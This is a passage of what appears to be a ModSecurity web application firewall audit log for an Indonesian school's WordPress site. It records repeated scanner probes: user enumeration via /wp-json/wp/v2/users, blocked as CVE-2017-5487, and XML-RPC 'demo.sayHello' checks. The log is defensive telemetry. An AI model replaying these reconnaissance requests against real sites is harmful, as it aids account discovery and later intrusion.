required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448103209577 5744 (- - -) Stopwatch2: 1747448103209577 5744; combined=4173, p1=546, p2=3399, p3=32, p4=36, p5=95, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68fc2304-Z-- --249f5761-A-- [17/May/2025:09:15:25 +0700] aCfxPXyxdQCiyU1ENFcodAAAAAY 103.236.140.4 45112 103.236.140.4 8181 --249f5761-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --249f5761-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --249f5761-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448125093446 2909 (- - -) Stopwatch2: 1747448125093446 2909; combined=1312, p1=433, p2=850, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --249f5761-Z-- --f013a803-A-- [17/May/2025:09:15:31 +0700] aCfxQ3yxdQCiyU1ENFcodgAAAAo 103.236.140.4 45116 103.236.140.4 8181 --f013a803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f013a803-C-- demo.sayHello --f013a803-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f013a803-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448131546098 5855 (- - -) Stopwatch2: 1747448131546098 5855; combined=4298, p1=558, p2=3517, p3=32, p4=34, p5=92, sr=78, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f013a803-Z-- --d187d371-A-- [17/May/2025:09:16:02 +0700] aCfxYnyxdQCiyU1ENFcoeAAAAAw 103.236.140.4 45120 103.236.140.4 8181 --d187d371-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d187d371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d187d371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448162325666 2825 (- - -) Stopwatch2: 1747448162325666 2825; combined=1283, p1=420, p2=833, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d187d371-Z-- --d9c8a172-A-- [17/May/2025:09:16:08 +0700] aCfxaHyxdQCiyU1ENFcoegAAABE 103.236.140.4 45124 103.236.140.4 8181 --d9c8a172-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d9c8a172-C-- demo.sayHello --d9c8a172-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9c8a172-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448168838203 4681 (- - -) Stopwatch2: 1747448168838203 4681; combined=3659, p1=446, p2=3019, p3=22, p4=23, p5=88, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9c8a172-Z-- --4ac9827a-A-- [17/May/2025:09:16:56 +0700] aCfxmOm4kjNN-hEbWjJBpwAAAEE 103.236.140.4 45128 103.236.140.4 8181 --4ac9827a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ac9827a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ac9827a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448216991177 2882 (- - -) Stopwatch2: 1747448216991177 2882; combined=1257, p1=440, p2=787, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ac9827a-Z-- --fc86480d-A-- [17/May/2025:09:17:02 +0700] aCfxnnyxdQCiyU1ENFcofQAAABQ 103.236.140.4 45132 103.236.140.4 8181 --fc86480d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc86480d-C-- demo.sayHello --fc86480d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc86480d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448222697725 5887 (- - -) Stopwatch2: 1747448222697725 5887; combined=4327, p1=554, p2=3433, p3=33, p4=36, p5=150, sr=72, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc86480d-Z-- --28fd2827-A-- [17/May/2025:09:19:24 +0700] aCfyLATOsBn9MSWb6WJu-QAAAIc 103.236.140.4 45156 103.236.140.4 8181 --28fd2827-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --28fd2827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28fd2827-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448364167933 2804 (- - -) Stopwatch2: 1747448364167933 2804; combined=1265, p1=449, p2=785, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28fd2827-Z-- --bd090554-A-- [17/May/2025:09:19:31 +0700] aCfyMwTOsBn9MSWb6WJu-gAAAIg 103.236.140.4 45160 103.236.140.4 8181 --bd090554-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bd090554-C-- demo.sayHello --bd090554-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd090554-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448371045757 4923 (- - -) Stopwatch2: 1747448371045757 4923; combined=3807, p1=481, p2=3036, p3=24, p4=28, p5=175, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd090554-Z-- --a3d14564-A-- [17/May/2025:09:21:28 +0700] aCfyqBKi5m5upc8uMd6iVAAAANQ 103.236.140.4 45192 103.236.140.4 8181 --a3d14564-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3d14564-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3d14564-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448488985808 3033 (- - -) Stopwatch2: 1747448488985808 3033; combined=1296, p1=451, p2=816, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3d14564-Z-- --0675aa2e-A-- [17/May/2025:09:21:34 +0700] aCfyrum4kjNN-hEbWjJBrQAAAEs 103.236.140.4 45196 103.236.140.4 8181 --0675aa2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0675aa2e-C-- demo.sayHello --0675aa2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0675aa2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448494606589 5676 (- - -) Stopwatch2: 1747448494606589 5676; combined=4136, p1=540, p2=3377, p3=32, p4=34, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0675aa2e-Z-- --4f33f74b-A-- [17/May/2025:09:33:24 +0700] aCf1dHyxdQCiyU1ENFcoiQAAABY 103.236.140.4 45246 103.236.140.4 8181 --4f33f74b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f33f74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f33f74b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449204164194 3302 (- - -) Stopwatch2: 1747449204164194 3302; combined=1453, p1=475, p2=946, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f33f74b-Z-- --2352da38-A-- [17/May/2025:09:33:30 +0700] aCf1enyxdQCiyU1ENFcoigAAABg 103.236.140.4 45250 103.236.140.4 8181 --2352da38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2352da38-C-- demo.sayHello --2352da38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2352da38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449210230210 5838 (- - -) Stopwatch2: 1747449210230210 5838; combined=4241, p1=563, p2=3454, p3=32, p4=35, p5=94, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2352da38-Z-- --006f9654-A-- [17/May/2025:09:35:03 +0700] aCf113yxdQCiyU1ENFcoiwAAAAA 103.236.140.4 45262 103.236.140.4 8181 --006f9654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --006f9654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --006f9654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449303722433 3244 (- - -) Stopwatch2: 1747449303722433 3244; combined=1416, p1=485, p2=898, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --006f9654-Z-- --7cb55361-A-- [17/May/2025:09:35:09 +0700] aCf13XyxdQCiyU1ENFcojAAAAAE 103.236.140.4 45266 103.236.140.4 8181 --7cb55361-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cb55361-C-- demo.sayHello --7cb55361-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb55361-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449309122824 4936 (- - -) Stopwatch2: 1747449309122824 4936; combined=3848, p1=478, p2=3106, p3=22, p4=90, p5=89, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb55361-Z-- --3805da1d-A-- [17/May/2025:09:35:59 +0700] aCf2D3yxdQCiyU1ENFcojQAAABc 103.236.140.4 45270 103.236.140.4 8181 --3805da1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3805da1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3805da1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449359667041 3339 (- - -) Stopwatch2: 1747449359667041 3339; combined=1495, p1=509, p2=953, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3805da1d-Z-- --d333a24a-A-- [17/May/2025:09:36:07 +0700] aCf2F-m4kjNN-hEbWjJBtQAAAEE 103.236.140.4 45274 103.236.140.4 8181 --d333a24a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d333a24a-C-- demo.sayHello --d333a24a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d333a24a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449367143564 5719 (- - -) Stopwatch2: 1747449367143564 5719; combined=4177, p1=561, p2=3392, p3=33, p4=36, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
